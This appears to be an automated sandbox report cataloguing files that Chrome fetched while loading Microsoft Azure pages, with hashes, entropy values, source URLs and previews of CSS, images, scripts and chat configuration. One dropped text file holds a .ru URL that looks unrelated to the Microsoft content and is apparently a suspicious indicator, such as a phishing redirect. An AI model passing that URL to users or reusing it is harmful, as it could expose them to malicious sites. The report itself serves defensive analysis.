                                                                        Preview:lpCb64064x38781({"id":1725073630,"name":"Azure Messaging English","description":"","json":{"logoAltText":"","scheme":{},"surveyAgentChatEnabled":false,"customVars":{},"postChatSurveyOnNonInteractiveChat":false,"sound":true,"smsPreFormId":"","surveyPreChatId":"315072652d636861742073757276657931343838333235343639353239","surveyPostChatEnabled":false,"language":"en-US","sendIconType":"arrow","widgets":false,"attachmentIcon":true,"clearHistory":true,"surveyOfflineId":"344f66666c696e652073757276657931343838333235343639323732","floatingWindow":false,"id":-1,"agentImage":false,"logoRedirectUrl":"","email":true,"agentAvatar":"true","surveyPreChatEnabled":false,"customStyle":{"v":"2.0","meta":{"fonts":{"1":"Arial,Helvetica,sans-serif"},"colors":{"11":"#f2f2f2","1":"#0363ad","2":"#000000","3":"#FFFFFF","4":"#b6b6b6","5":"#6D6E70","6":"#50e6ff","7":"#D2D2D2","8":"#243a5e","9":"#ffffff","10":"#6e6e6e"}},"config":{"transcript_bubble_agent_text":{"attrs":{"style":{"color":"{{colors.2}}","font-weight
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):982
                                                                        Entropy (8bit):5.055900899767409
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:FA6F56B2D3037982772378233706C9AF
                                                                        SHA1:A511B80627BF05C511F348B3C1AAF4F2FA174365
                                                                        SHA-256:BE37586E1929EF52245871FB9FB2C2E2A31A14EE9B421439CA67948EC4036188
                                                                        SHA-512:14E7287DEFBE26244B9C19EDAE24B3BFE7E336D41FA1AE85142B8ECB18CC20458953B0BBEC9E10EF6691FDB059494BFE65269AB47D2A2AC49A84D6EF7F2AFFAC
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-chat.min.ACSHASHfa6f56b2d3037982772378233706c9af.css
                                                                        Preview:#chat-now-link:not(.pmg-chat-active),#chat-button:not(.pmg-chat-active),#pmg-chat-now:not(.pmg-chat-active),#chat-now:not(.pmg-chat-active),#mobile-chat-now:not(.pmg-chat-active){display:none !important}.[data-oc-chat='true'],[data-oc-widget-chat='true'],[data-oc-widget-chat-bot='true']{display:inline-block !important}..proactive-chat-hidden{display:none !important}..lp-iframe-close{display:none}.#lp-iframe-container{border:0;bottom:24px;box-shadow:0 5px 15px 0 rgba(0,0,0,0.25);height:500px;left:auto !important;min-width:300px;max-width:350px;padding:0;position:fixed;right:0;top:auto !important;z-index:1031}.#lp-iframe-container,#lp-iframe-container .lp-iframe-window{border-radius:5px}..lp-live-person .c-flyout{font-size:15px;position:absolute;background:#fff;min-width:128px;max-width:296px;padding:12px;z-index:700;display:none}..lp-live-person [aria-hidden="false"]{display:block}..lp-live-person .lp-iframe-window{border:1px solid transparent;height:500px;width:350px}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1312x984, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                        Category:dropped
                                                                        Size (bytes):157594
                                                                        Entropy (8bit):7.998519075204403
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:50AAB20EB2879086C03C1DDFDEDA2FF0
                                                                        SHA1:424F9DF1110AD1176D6937A7FF84AF47301726B1
                                                                        SHA-256:47BF09D0BA6CFD343700C20112A451118F52E525ED2FD733EBA57890E4D0686A
                                                                        SHA-512:B9C65415C39923A4563D19E5FCB1CE806FBEA93EA0B66291EB4A75067E0EA8C538B56AE5E747AB6EE4D9D6C16318E1373728293D9C43352B9F46FA1D2CF5C1E4
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF.g..WEBPVP8 .g.......* ......%.|..?=....~..>....?....._....>.....o......U.....o.J..E{............_.;M.....a._............G@./.t...A.#.?.g...z......G..9....u.....O.W...?".[..g...~...s.+..p..|..o....f..|Q..._..............o...v>|.T._.G.....G............/....?n..~......1.c.........?w...l}..................j~..........[./..p......O.......C......./...............?.......?.....{....o.......?..?....!.........._v..?p.....{..x.....w..._........................._.........'......u............_.._...}..C..@...{..............K.....;...o...&~..............?{...............?....%.....?.........{.....C....i.'.6.."....}4.v.|...K..t\$ .@.._..Y/.*F.d.+;....0..Y/.]....G8....R...Xw...tH..,.8(`..u^.!K. ...b...u..i......#Y......i.........ZM........r_.k..7(....z.B.i..h.st..r[.*..<S.X<gw..AT.7..Y.6~In...5.....y35.....-..N.P...K}..woPtP..`.f\.6.7.BV....~e.j...N..3yH;...O.R....<..if..;..U.1.$F...7.8v..w.. ^Ep.....D.E...)M.].....VY.yc....6;...PX..z..u..&..=5..F..V!..=....W.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):210273
                                                                        Entropy (8bit):7.998758480204577
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:691496BE74CCB486228135269CED98C8
                                                                        SHA1:BA36DAC272F360ACA65724A61F0EC97710BDBEFA
                                                                        SHA-256:FC8A9CF99719C21930AA83C893B09075FC4A2035A808C0B42821DDA0E8EC4875
                                                                        SHA-512:A855B4FE2B39303CB6D0F1E1C286B45950B467643849A3A5DA0EB1E9DAB39358781B151FF7AB907637B74596A58DD390CD46FFE91BB4A603FE363CE584181FE2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Desktop-solutions-tab4-img2@2x?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1312&hei=984&qlt=100&fit=crop"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............4G...(iinf..........infe........av01Color....jiprp...Kipco....ispe....... ........pixi............av1C........colrnclx...........ipma.................4Omdat.....*h.......2...D.......N....-O..xu..P.m..=.W.Yqd..1.....&...s.@2.`"..8...._..l.).%.9.e=..|..$..c..M.Z.W.4l..G.D.I~...k.v.Z.Jt....L-.?gp,.O7...B.7....s.q...../.i...(4qI._D..t$...!..o.!...Y]..%.A\.a....}".pm.N...H..%..._..."....(.. ..-....V...9.~.S.=]mz......ZC]7...08..;..b....X..uV.-.=Fk.D3.......'3....M..............].......e.]k.I..Y.....B.....k.H.}.W/.G.1.. .=~.=<.....S7.....-.."...w..J.R:....x.D..._....5X.ip..Z.o..5..@.R..T....x.Z./B.rmxpJ..|.m#(F.l.&(....f.M..V{..CO...6...+M........:0+.F.=.$..zH.b&.L8>....M.fm..)'..!.s..jX.o\..`..\.....BI.....8..t.DmU.C...X_.JY..UN.h_..f.\.K..Ex....r.....N..p.....Amk.Ov..p\..y..]H..h...Y.C...s.........0.R.'.....x...$.X.h.y..B\...!... .U.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):219872
                                                                        Entropy (8bit):7.691302958153334
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1104908137B5D513286EE52883B1C872
                                                                        SHA1:EFB32F4280F64037A75E56C673F4E4B1533886B5
                                                                        SHA-256:0B3D48D23F2997A4E5A715791889217CFE9E7FBABE17B867FA9250D26CCE9108
                                                                        SHA-512:83CC3BEF5155B085E9470C2B37344A5CF1FFCABE36E596CB5296210EA1E4533C26D9DE7E9D844AC48A04665A7009C3F6E87BB367BE956FEC3F46F9358405DD0D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF.Z..WEBPVP8L.Z../....H.d;l.y.~8~|....*)!...@.H..H.....F>.93/..../o..@B.\..........O._.h_.......J.....WI..^;&..L..M.}{...p.......6....0..h.....I....;....-!.....km....`.....7......HE..<...n..x+..,C..6C.....m.Go.......K.I.]$.....V..8l'.c..).m...`....v^........(.n .v0)?.W..2.d...nw..[.].h.I.c....hIZUI0 ..l......~@.....e...R.oA%..f....^.[.[.3..h1.........S..D..Vw...k.%Q.V..4C2..Vk-....gH....3..$..`..0.$1'.9/.q.@>..d.LIc...$...).....i..J.d..4..tR%.....1.c.Q.q.Z'.G.L$....@Z.E..M.a..g..!..Nd.....aq.\....F..?,o?h).$I....r.w.#.Oe...<.H. ...O...K..4J)....r&...T...N.L&e2....RJ...T.(.4Rc2)99.R..3...e).,...K9)5RJ)GJ....0.4.e....MJ9Y*.s)'.2J.R..+e.R.d...e...H).2cF....R.i..\.S.M......r.J.7.Jy..r]}S...R.)......x=..3.u..=.-....\>.y.......y...k......2)Y....x="...F...u.9.....v2W....!.5"..`B...{....sD...V...ba.......}tt$.dg{hg.UYJ#....0.18....>..x...S...M-...n....Xn.{.q.].)iF.|Z.<..bg..|.v..k.C.[..R...X.r.l.d..?......\._....z-)2JY.r.&..8......,...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):32
                                                                        Entropy (8bit):4.327819531114783
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A8A3710424DC6E0DFF393C6964441BDB
                                                                        SHA1:E4978066791DD394BDDD174F2687A7CDD43442B2
                                                                        SHA-256:46CD047CC0D3D10776E2F50D4C9D55DB58BD97D7A95B7D691F53D4937C71CF00
                                                                        SHA-512:EE135EE50868E59853C8FE57A9471AE1FBBDE30A929D33B4A4D56200E70C93AFDFF0301EF7FEBC803258C2BA2DCBC183E632B2ADA1745D3C87C1EEB98E8DEE62
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/microsoft/components/content/universalheader/v1/universalheader/clientlibs/site.min.ACSHASHa8a3710424dc6e0dff393c6964441bdb.css
                                                                        Preview:[class*="z-"]{position:relative}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (21576), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):21576
                                                                        Entropy (8bit):4.929076929051309
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:9110F0BA62EE437FD5FDCD79F4AC776E
                                                                        SHA1:0D28FB9CD5B3F26376E8E34F049DF384D77C7EFB
                                                                        SHA-256:226F67917B6220578B731A11080F2BAD4A752E9D7EE8DC34D50ED432011A4CFF
                                                                        SHA-512:96E12B0227C5704499FAEADAC56F271B2EBA36071351487559308E15C4BF83F0DA21C2B1DF724AC4CE1C802F0B105D002081E9A53E3524A6D1DF887096F826E6
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://accdn.lpsnmedia.net/api/account/60270350/configuration/le-campaigns/zones?fields=id&fields=zoneValue&cb=lpZonesStaticCB
                                                                        Preview:lpZonesStaticCB([{"id":138781714,"createdDate":"2017-02-28 18:44:28","modifiedDate":"2017-02-28 18:44:28","name":"Right Overlay","deleted":false,"zoneType":1,"mainZone":false,"capping":0,"mapping":[{"engagementSubType":19},{"engagementSubType":24},{"engagementSubType":27},{"engagementSubType":18},{"engagementSubType":22},{"engagementSubType":17},{"engagementSubType":26}],"isDeleted":false},{"id":138781814,"createdDate":"2017-02-28 18:44:28","modifiedDate":"2017-02-28 18:44:28","name":"Offsite","deleted":false,"zoneType":2,"mainZone":false,"capping":0,"mapping":[{"engagementSubType":30},{"engagementSubType":28},{"engagementSubType":29}],"isDeleted":false},{"id":138781914,"createdDate":"2017-02-28 18:44:28","modifiedDate":"2017-02-28 18:44:28","name":"Left Overlay","deleted":false,"zoneType":1,"mainZone":false,"capping":0,"mapping":[{"engagementSubType":20},{"engagementSubType":25},{"engagementSubType":21},{"engagementSubType":23},{"engagementSubType":16},{"engagementSubType":15},{"engag
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (24837)
                                                                        Category:downloaded
                                                                        Size (bytes):24949
                                                                        Entropy (8bit):5.2312828786862395
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:CDAC009AA733269D648461499E0869F2
                                                                        SHA1:C74BBB5EDC41B9DB60EF45262DF964E7E60A3272
                                                                        SHA-256:2E38BC618D4A4277FE6D05DA9272A916D12515FB4533C600A4EAE77F68007437
                                                                        SHA-512:1C9F4CF40DEB7D5E7FA83B3DEE4D5B5AAADCB5A20AEF61DCE2B4A0A1037225E5FB3493F92BCE40F04A02CA9EB791F1AFE6F28A47E3D72F432B2DDF61F3AF45E7
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://assets.adobedtm.com/5ef092d1efb5/d6d76b37b476/launch-41185cd0b005.min.js
                                                                        Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/d6d76b37b476/launch-41185cd0b005.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-02-14T10:24:39Z",turbineBuildDate:"2023-02-22T20:37:26Z",turbineVersion:"27.5.0"},environment:{id:"ENe5ac16c0abde4e0db8a4cd055e2bbf71",stage:"production"},dataElements:{cachebuster:{defaultValue:"",cleanText:!0,storageDuration:"pageview",modulePath:"core/src/lib/dataElements/randomNumber.js",settings:{max:1e6,min:1}}},extensions:{core:{displayName:"Core",hostedLibFilesBaseUrl:"https://assets.adobedtm.com/extensions/EP2e2f86ba46954a2b8a2b3bb72276b9f8/",modules:{"core/src/lib/dataElements/randomNumber.js":{name:"random-number",displayName:"Random Number",script:function(e){"use strict";e.exports=function(e){var n=Math.ceil(e.min),t=Math.floor(e.max);return n>t?NaN:Math.floor(Math.random()*(t-n+1))+n}}}}}},company:{orgId:"EA76ADE95776D2EC7F000101@AdobeOrg",dynamicCdnEnable
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:SVG Scalable Vector Graphics image
                                                                        Category:downloaded
                                                                        Size (bytes):681
                                                                        Entropy (8bit):5.043291133932798
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:104138E7B8F89DBF7CC66485544A0669
                                                                        SHA1:7C3F43BDA4BAF55F893876DC62B55800E194F135
                                                                        SHA-256:FCA9EEC67C99F083AF9AA30169AF20B7DE12949D45A48FACC70B061F1F0FCBE0
                                                                        SHA-512:7BE127AE63F31606BFC909476F8ACF4857726E6C5A7CCCE06FF6EB713CFA328DB58B2FBDBBB298D59030CED8853AEE4771D865DCAA487871E6F71E79CE687F98
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/Ai-icon-dark
                                                                        Preview:<svg width="43" height="32" viewBox="0 0 43 32" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_14400_15452)">.<path d="M0 14.9335C0 6.68606 6.65493 0.000183105 14.8642 0.000183105H28.1358C36.3451 0.000183105 43 6.68607 43 14.9335V17.0669C43 25.3143 36.3451 32.0002 28.1358 32.0002H0V14.9335Z" fill="#004275"/>.<ellipse cx="12.6195" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.<ellipse cx="21.0326" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.<ellipse cx="29.4457" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.</g>.<defs>.<clipPath id="clip0_14400_15452">.<rect width="43" height="32" fill="white"/>.</clipPath>.</defs>.</svg>.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):30
                                                                        Entropy (8bit):3.9199025797939586
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:ED6013276B210D59C028E0B2803428CF
                                                                        SHA1:B22585B605566606FF27FF151C2C9C3C6B87B0D3
                                                                        SHA-256:3D21A234DA5E632DBC50AFD212753990BD13B0C0C4F825E9D0279A0DFA7AEE06
                                                                        SHA-512:B1A71F39C582F9DD875455A3DA5C224B7ACDB35709BF663942396EB2E66C7EF6C7FD9502F58B29F8AACD3E117BC2FCFE58316BC86CE16D5B6C2587953BD705C3
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:https://ust.tolegtynl.ru/Lhkb/
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):60462
                                                                        Entropy (8bit):7.996205737027862
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:4F69B815A93873DD7CA0F466160102C5
                                                                        SHA1:643A758E7B4ED27C52A97339062860EE3E4552FC
                                                                        SHA-256:CEBB3FD7E186FB2F3FE5195DCEAAAE69BB383FFB10B367D743206F42E74E1E31
                                                                        SHA-512:265CB3824E5ACF54A72CBA69AC60B2927D7541B9FA2418A4A21D02BBB53517961EFE35A92D411259F05FFC18537EBC117029CF621004ABBC8570F4E3DCA0B51F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/371220-desktop-3upmediacard-featurednews-bg?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1600&hei=751&qlt=100&fmt=png-alpha&fit=constrain"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe.......@........pixi............av1C........colrnclx...........ipma...................mdat.....*q.......2...D.......GT.......e.{:3.QCl....n..T..4.9q?@X..m..(.k.+\.....=L..f..io.l..N.G2}.o:...<.~..?........cW..3.v./.I.l.....N..Ol.IH...(......e.iwd..h%.s.G.`...(....c....e)....r..D.2.l>Y..1."Y........x.I..)..m..^.....Ah.(F&V/......\...9g.9...F.#..Q.k..2P.x.v..l^..9....E..8.-...i.M...3.Bc.eP.F=B|...........?K./. M..yt.....3..E......l.-9.zK....m..+.eK2P1.Dz... *.4]P.}.Q...6......R..Z.2..f;...N..sGKB<.'.&..Y.}.4.......0...a.q.q..A..J.L......5.A..2m.4..?.'A..S@.&..[..?.:.S...|..LSp..R.....w..!..u..Dd.G...g&Ej......}.j...jw.R]..].Va9a...D.....5OB'...1.........>o:U.......r..z.......(..]I".....yB..H.r..........c..q"......Iv..j...g^...........!..<..O....>.h..X....7.....q..x....T
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                        Category:downloaded
                                                                        Size (bytes):171505
                                                                        Entropy (8bit):5.043804815226508
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8F186BBA557DC6140841C682AF4D60EE
                                                                        SHA1:CE2F96E57EE3D9ED15B8A2DD3EBDC7E54439AF98
                                                                        SHA-256:CDA4813A965CCD1AAA50550D08B928AAF4C7F50B6F77823213FE3A97E806C2F1
                                                                        SHA-512:17ACC430C28A171C1FD029C1B0EB67BE14ED41ED9F7F10E4040ABA1FA39B8DA5CAC7CDF979BAB6CAFAD126AA94C88D123F170E78C51745C3833AE80AD23FB36A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/1b-9d8ed9/c9-be0100/a6-e969ef/43-9f2e7c/82-8b5456/a0-5d3913/52-918540/ca-ae3ce4?ver=2.0&_cf=02242021_3231
                                                                        Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):584
                                                                        Entropy (8bit):4.8920050609070405
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:381C7C29564E2BDCFB644BC9E89E18A4
                                                                        SHA1:01A8255EA6F3A030FC83C343252D8A88FCDB5B52
                                                                        SHA-256:3F209A8E721FFD91D7CA9B746FC928F35BC6AA6E19D43E9B02F29293174033E7
                                                                        SHA-512:73B7B00F793BF222FE3D253D46DA66D8AE6822B17D760CB0E4EC1F4BABF374C00D93E69074D48567551C61A49BEAE6119224BA92FBB8FC6A646796D36BE4BFFC
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/components/content/reimagine/blade/card-grid/v2/card-grid/clientlibs/sites.min.ACSHASH381c7c29564e2bdcfb644bc9e89e18a4.css
                                                                        Preview:[data-carouseltype="appSourceMostViewed"].appsource-grid-container{width:100%;min-height:622px}.[data-carouseltype="appSourceMostViewed"] .carousel.carousel--type-promo{height:100%;align-items:stretch}.[data-carouseltype="appSourceMostViewed"] .carousel-product-card{position:relative}.[data-carouseltype="appSourceMostViewed"] .appsource-cards-container{min-height:530px}..appsource-spinner-container{width:100%;height:100%;backdrop-filter:blur(3px);position:absolute;top:0}..appsource-spinner-container .spinner{z-index:2;margin:auto;position:absolute;top:0;left:0;bottom:0;right:0}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):246956
                                                                        Entropy (8bit):7.7868544640708945
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:CB19BA73C594457CA1EDC424442C7ECF
                                                                        SHA1:C1164038F499702F4227C51AAF69C6564C1917A8
                                                                        SHA-256:C2A30026D48B9EA05C942A324D3BB8A932CF27FD49AAB75DB149E54635B099ED
                                                                        SHA-512:047F51475516E7000DD0FD1FDBB41F9FFF9404EF21E7EAA7D6E16903EB9CEE05F58AD3F1ED3C649E1A0D9FEFBCF1B4F0B82ADE93591229E54BE6ADFA16069726
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF....WEBPVP8L..../....@.d+l3..3<... '%D...H.I....p7...#.V....y.....H.K..>..C.y.$$...K.....Vm....W.J=...o..&...........;..L.....C..}.....poW.Jc.rK..._bW.nnpH.X./.l......5....1...8..I`..y..........rr1......6.../o..Ir.j.pnl.wR.1......:.n.K0@..g.f...jj.r..Ml....s3{R....K*..m+.J2.......j.J.a..Z+y0..T..&....|.I..z.3....X+....|T.m.|.....N....... .G..._;i....l!i.d..V.WR[.UOI.!I,XK...."..`..h..Ib-.k..8@..| I.ZkI.c..-...!E.....m.C.X.....['S..4`h.q.c.95.\...$.I...mt..`.O..x..z...Q.B......."I.d.h.!...Yv..:.W.?..OCA.$I..{....<A........q..@..8..P47..-..::R%.T.0HSQaWa..3........[90G.S..2.!A.....04...7Eu..]...4..R..0*..U...vvF......h+.34J.d.vv'.....TX.P.E.(.Y.U.*..5v.....T....'.O.).....)....U'x*J...g....\.z..h..Uq.5W..X.......`GY7.$*N.u5.?...5+..*@.&B.v."..p!L.aWAp........B....h...x.. .X...W...V..,...m..|........i...H.J.D.DX.....B.{..q...........N".Y........0`...V...;v.....u...c.P..)mm...!..}.Pk.....Y..}86:.;;...B...Z...tyB...V...5.f.|.%.@.:......3Z.2..Z
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (32098)
                                                                        Category:downloaded
                                                                        Size (bytes):143130
                                                                        Entropy (8bit):5.330341741940889
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B2193EE3D1A572C4DE0275BB103C5293
                                                                        SHA1:802AB2E55CE99CE6F37253692F7CFD9229EA65A4
                                                                        SHA-256:8EE3C3B99F088F30D5C2CAB98F1688E24D5F9333A164C7610310779EF0EC522A
                                                                        SHA-512:E79020F2B363A5D4059745B16597B7796EE24DBDE0AFFE331BE611D149B960630839F9D757938C969F4A2D00CF49995F3152D952A32D7A3E473BC4B8CD10C825
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-chat.min.ACSHASHb2193ee3d1a572c4de0275bb103c5293.js
                                                                        Preview:/**!.. @license. handlebars v4.7.7..Copyright (C) 2011-2019 by Yehuda Katz..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARI
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):197148
                                                                        Entropy (8bit):7.998406365943986
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:4E9CEC6360008295E3B6CBF485A37B4C
                                                                        SHA1:1B5B9B0E2A09AE90A9F35B19D1A44BD9E4E5EF03
                                                                        SHA-256:9DE136FC3FBDD14F35F9D0FFD08660DCB78B49ED2EFEEEE6CA8517437AD23088
                                                                        SHA-512:895EB5C6DA7367BF7049B51D56216CB6F8CAB1DF7B1C480360159C02BF3AB3C79211D7258E79D60C7D7DFC2DA1FF313279B2BD5EF7C1C84C71EFF375CB875119
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Desktop-solutions-tab4-img3@2x?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1312&hei=984&qlt=100&fit=crop"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe....... ........pixi............av1C........colrnclx...........ipma...................mdat.....*h.......2...D.........i]...NPH...._..=.z..M.]NmV.9..%.-E.P....b..B.].,..=w7.....7...?*n...O..5............z.?O..>...T..~.)=..P..m...3^q../....DU..Lt..`\BuNE...".\."O.X.*7d....:..I.....J..~#.<..i...h....M..f..j];pO.x.ek.,]..K%s..c&.,q...E..G.'.j..@.9.~D.kl...Uh..4K..8.f;L=.>.S...j.u.z..,.j.y4#.;..h......n....h1..10.....C.....)..k+..Qx.p.X JZn<.....(5...@!.K.I...f/.C.U_.* .9.....'..n..F...v....z..X.EC......e........+. ...?0....YtmV.D]..67,]y......9"...^A'.i.t.;x...'.}*[95.D[.-..nu7.....pQ.K.K....n....$xR......&En....B...1v..7.q. d?.*..SGL.....@....=.'..#].3R@.z..Ez......T.\....>.9oZ.*...w...@E8E..;.Uz8..~..U..gM.......s...o........*b.TLa@z.....L..o.....w.8A.d8.......A.~%..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1312x984, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                        Category:dropped
                                                                        Size (bytes):294404
                                                                        Entropy (8bit):7.999328697188318
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:7A48B72D038D04D98923887381D295FF
                                                                        SHA1:7F904E9A4256FEEDEC2D06A2D7D4FC4B0B5D2C8C
                                                                        SHA-256:144767EE4A5234683E3975C6B96B9DCDBC320A7500510A4BD2D3002BEA4090F1
                                                                        SHA-512:157071C1ECB232CBE1573E03EF1174E39E8407FF3C0F2FA0CF1736DCC0FE63F0C06969C9A294503E02772350F7055E0C4801387DFA1151BA373F77FF3248B827
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF.}..WEBPVP8 .}.......* ......%.u.y9<..l..=............~O..?..Ao.t.g..^v.........](.......u.....3.U.G..{........?1ON..._........5......2:....n........._.'....?..3.w..d`..:.f............O........../........?.?....u...Tz..........#....................O....A.........{.'......?..../.....3....._......................?......../......O.....|1.........o.....?=~g.....a...w.G./..........%...................o...../t....~......_................._........]...G........Oa?.~1.7........._............i.......S.........o._.........................}...7......K....._..`......O...............................?.?.............`_.............._..$?............~....+...?._.?....}.........?..................x.....K.u.m........M.cH..*8_M.]..2x...p....8P0?..w.VK.J.......%.a0.>p.K..m}.|.............?.].&./...&3h.W..R..%..X...c..@50e@GH.B._.%.r..f....Ec..A.ig.{E...Z......#.....Zm..2..1.%..J.z.O.........U...;.p..[..6.o=m..L.A}.{.+...e.S..=.!R.m;.....1-6.4.."...P..3e1..c...z..w..R.....S...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (64796)
                                                                        Category:downloaded
                                                                        Size (bytes):601837
                                                                        Entropy (8bit):5.113246832731609
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:10F475F82A7B1AA39752E1331D2F46D8
                                                                        SHA1:E48E36770131D504D93605330B6FEE440494CEFF
